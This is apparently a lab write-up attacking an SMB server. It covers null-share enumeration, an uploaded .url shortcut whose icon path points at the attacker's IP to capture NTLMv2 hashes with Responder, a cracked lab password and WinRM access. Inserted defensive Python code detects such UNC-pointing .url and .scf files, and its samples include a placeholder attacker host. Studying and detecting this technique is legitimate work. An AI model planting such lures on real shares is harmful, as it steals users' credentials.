SMB

Null share

do_connect: Connection to 192.168.227.172 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	C$              Disk      Default share
	DocumentsShare  Disk
	IPC$            IPC       Remote IPC
	NETLOGON        Disk      Logon server share
	SYSVOL          Disk      Logon server share
Reconnecting with SMB1 for workgroup listing.
Unable to connect with SMB1 -- no workgroup available
╰─ smbclient --no-pass   //192.168.143.172/DocumentsShare
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Fri Nov 19 03:59:02 2021
  ..                                  D        0  Fri Nov 19 03:59:02 2021

		7706623 blocks of size 4096. 714067 blocks available
smb: \> exit
╭─ /home/kali/Vault ✔ 12s root@kali
╰─ echo "lol" > lol.txt
╭─ /home/kali/Vault ✔ root@kali
╰─ smbclient --no-pass   //192.168.143.172/DocumentsShare
Try "help" to get a list of possible commands.
smb: \> upload lol.txt
upload: command not found
smb: \> put lol.txt
putting file lol.txt as \lol.txt (0.0 kb/s) (average 0.0 kb/s)
smb: \> ls
  .                                   D        0  Wed Jul 20 16:59:53 2022
  ..                                  D        0  Wed Jul 20 16:59:53 2022
  lol.txt                             A        4  Wed Jul 20 16:59:53 2022

		7706623 blocks of size 4096. 714036 blocks available
smb: \> 

We also have write permissions on the share.

PORT    STATE SERVICE       REASON          VERSION
445/tcp open  microsoft-ds? syn-ack ttl 127
|_smb-enum-services: ERROR: Script execution failed (use -d to debug)

Host script results:
| smb-protocols: 
|   dialects: 
|     2.0.2
|     2.1
|     3.0
|     3.0.2
|_    3.1.1
| smb2-capabilities: 
|   2.0.2: 
|     Distributed File System
|   2.1: 
|     Distributed File System
|     Leasing
|     Multi-credit operations
|   3.0: 
|     Distributed File System
|     Leasing
|     Multi-credit operations
|   3.0.2: 
|     Distributed File System
|     Leasing
|     Multi-credit operations
|   3.1.1: 
|     Distributed File System
|     Leasing
|_    Multi-credit operations
|_smb-print-text: false
| smb2-time: 
|   date: 2022-07-20T19:47:10
|_  start_date: N/A
|_smb-vuln-ms10-061: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled and required
| smb-mbenum: 
|_  ERROR: Failed to connect to browser service: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
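The scan output above already tells a defender what matters about this service: which dialects the host offers, whether SMB1 is still enabled, and whether message signing is required (it is, on 3.1.1). The following Python is an added example, not part of the original write-up: it parses nmap's `|` / `|_` host-script layout (the indentation rules are my assumption about nmap's output format, not documented behaviour) and reduces it to those facts plus the hardening actions they imply. The first sample is copied from the scan above; the second is a constructed weaker host so the other branches are exercised.

```python
"""Parse nmap NSE host-script output for SMB and summarise hardening posture.

Added example, not from the original page. The parsing rules below are an
assumption about nmap's '|' / '|_' line layout.
"""

# Sample copied from the nmap output above.
NMAP_SAMPLE = """\
Host script results:
| smb-protocols:
|   dialects:
|     2.0.2
|     2.1
|     3.0
|     3.0.2
|_    3.1.1
|_smb-print-text: false
| smb2-time:
|   date: 2022-07-20T19:47:10
|_  start_date: N/A
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled and required
"""

# Constructed sample of a weaker host (SMB1 on, signing not enforced).
WEAK_SAMPLE = """\
| smb-protocols:
|   dialects:
|     NT LM 0.12 (SMBv1) [dangerous, but default]
|     2.0.2
|_    2.1
| smb2-security-mode:
|   2.1:
|_    Message signing enabled but not required
"""


def parse_nse_output(text):
    """Group NSE output lines by script name.

    Top-level lines look like '| name: value' or '|_name: value' (at most one
    space after the pipe); lines indented further belong to the script most
    recently seen. The '_' only marks the last line of a block.
    """
    scripts = {}
    current = None
    for raw in text.splitlines():
        if not raw.startswith("|"):
            continue                      # port table, headings, blank lines
        body = raw[1:]
        if body.startswith("_"):
            body = body[1:]
        indent = len(body) - len(body.lstrip(" "))
        if indent <= 1:
            name, _, rest = body.strip().partition(":")
            current = name.strip()
            scripts[current] = [rest.strip()] if rest.strip() else []
        elif current is not None:
            scripts[current].append(body.strip())
    return scripts


def assess_smb_posture(text):
    """Return dialects, SMB1/signing flags and the hardening steps they imply."""
    scripts = parse_nse_output(text)
    proto_lines = [l for l in scripts.get("smb-protocols", []) if l != "dialects:"]
    # nmap prints SMB1 as 'NT LM 0.12 (SMBv1) [dangerous, but default]'
    is_smb1 = lambda l: "SMBv1" in l or l.startswith("NT LM")
    smb1 = any(is_smb1(l) for l in proto_lines)
    dialects = [l for l in proto_lines if not is_smb1(l)]
    sec_lines = scripts.get("smb2-security-mode", [])
    signing_required = any("enabled and required" in l for l in sec_lines)

    recommendations = []
    if smb1:
        recommendations.append("SMB1 is offered: disable the SMB1 server feature")
    if not signing_required:
        recommendations.append(
            "SMB signing is not required: set LanmanServer RequireSecuritySignature=1 "
            "so captured or relayed authentications cannot be replayed")
    return {
        "dialects": dialects,
        "smb1_offered": smb1,
        "signing_required": signing_required,
        "recommendations": recommendations,
    }


if __name__ == "__main__":
    for label, sample in (("scanned host", NMAP_SAMPLE), ("weak host", WEAK_SAMPLE)):
        print(label, assess_smb_posture(sample))
```

On the host above the function reports signing as required and returns no recommendations, which is why the write-up goes on to capture and crack a hash rather than relay it.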

Because the null share was writable, we could upload some sort of file that would let us capture hashes with Responder; the TJ Null list notes that this box requires MITM.

I covered this form of attack in one of my attack-vector sections.

batcat not-virus.url

[InternetShortcut]
URL=anything
WorkingDirectory=anything
IconFile=\\192.168.49.100\%USERNAME%.icon
IconIndex=1
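From the defender's side, the artefact this leaves behind is a shortcut file sitting in a writable share whose IconFile points at a UNC path, so that is what to hunt for. The Python below is an added example, not code from the original write-up: it parses Internet Shortcut (.url) and, as a generalisation of the same trick, Shell Command (.scf) files with a hand-rolled INI reader (so `%USERNAME%` and backslashes are not mangled), flags any auto-resolved key whose value is a UNC path, and can walk a mounted share. The key lists are my assumption and are not exhaustive; the first sample is the file above, the other two are constructed.

```python
"""Find shortcut-style files whose auto-resolved keys point at a UNC path.

Added example, not from the original page. AUTO_RESOLVED_KEYS is an
illustrative assumption, not an exhaustive list.
"""
import os
import re
from collections import namedtuple

Finding = namedtuple("Finding", "path section key host value")

# Keys whose value Explorer dereferences when the folder is merely rendered.
AUTO_RESOLVED_KEYS = {
    "internetshortcut": {"iconfile", "url", "workingdirectory"},
    "shell": {"iconfile"},          # .scf files use a [Shell] section
}
SCAN_EXTENSIONS = {".url", ".scf"}

# \\host\share\... or a bare \\host
UNC_RE = re.compile(r"^\\\\([^\\]+)(?:\\|$)")

# Sample 1: the not-virus.url file shown above.
SAMPLE_URL_FILE = r"""[InternetShortcut]
URL=anything
WorkingDirectory=anything
IconFile=\\192.168.49.100\%USERNAME%.icon
IconIndex=1
"""

# Sample 2 (constructed): benign shortcut with a local icon path.
BENIGN_URL_FILE = r"""[InternetShortcut]
URL=https://intranet.example.local/
IconFile=C:\Windows\System32\shell32.dll
IconIndex=3
"""

# Sample 3 (constructed, placeholder host): .scf variant of the same trick.
SAMPLE_SCF_FILE = r"""[Shell]
Command=2
IconFile=\\attacker-host.example\share\x.ico
[Taskbar]
Command=ToggleDesktop
"""


def parse_ini(text):
    """Minimal INI parser: {section_lower: [(key_lower, value), ...]}."""
    sections = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in ";#":
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, [])
        elif current is not None and "=" in line:
            key, _, value = line.partition("=")
            sections[current].append((key.strip().lower(), value.strip()))
    return sections


def find_unc_references(text, path="<inline>"):
    """Return a Finding for every auto-resolved key whose value is a UNC path."""
    findings = []
    for section, pairs in parse_ini(text).items():
        watched = AUTO_RESOLVED_KEYS.get(section, set())
        for key, value in pairs:
            if key in watched:
                m = UNC_RE.match(value)
                if m:
                    findings.append(Finding(path, section, key, m.group(1), value))
    return findings


def scan_tree(root):
    """Walk a mounted share and collect findings from every .url/.scf file."""
    findings = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if os.path.splitext(name)[1].lower() not in SCAN_EXTENSIONS:
                continue
            full = os.path.join(dirpath, name)
            try:
                with open(full, "r", encoding="utf-8", errors="replace") as fh:
                    findings.extend(find_unc_references(fh.read(), full))
            except OSError:
                continue                  # unreadable file: skip, keep scanning
    return findings


if __name__ == "__main__":
    import sys
    root = sys.argv[1] if len(sys.argv) > 1 else "."
    for f in scan_tree(root):
        print(f"{f.path}: [{f.section}] {f.key} -> host {f.host} ({f.value})")
```

Run it against a share mounted locally (for example `python3 scan.py /mnt/DocumentsShare`); any hit whose host is not one of your own file servers is worth an alert, and the same check applied at write time on the share is a cheap preventive control.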

After cracking the NTLMv2 hash, the password for the user anirudh was SecureHM.

Using CME I had access to the C$ share and could write to it. The user could not write to ADMIN$, so I was not able to use psexec. I got a shell through WinRM.
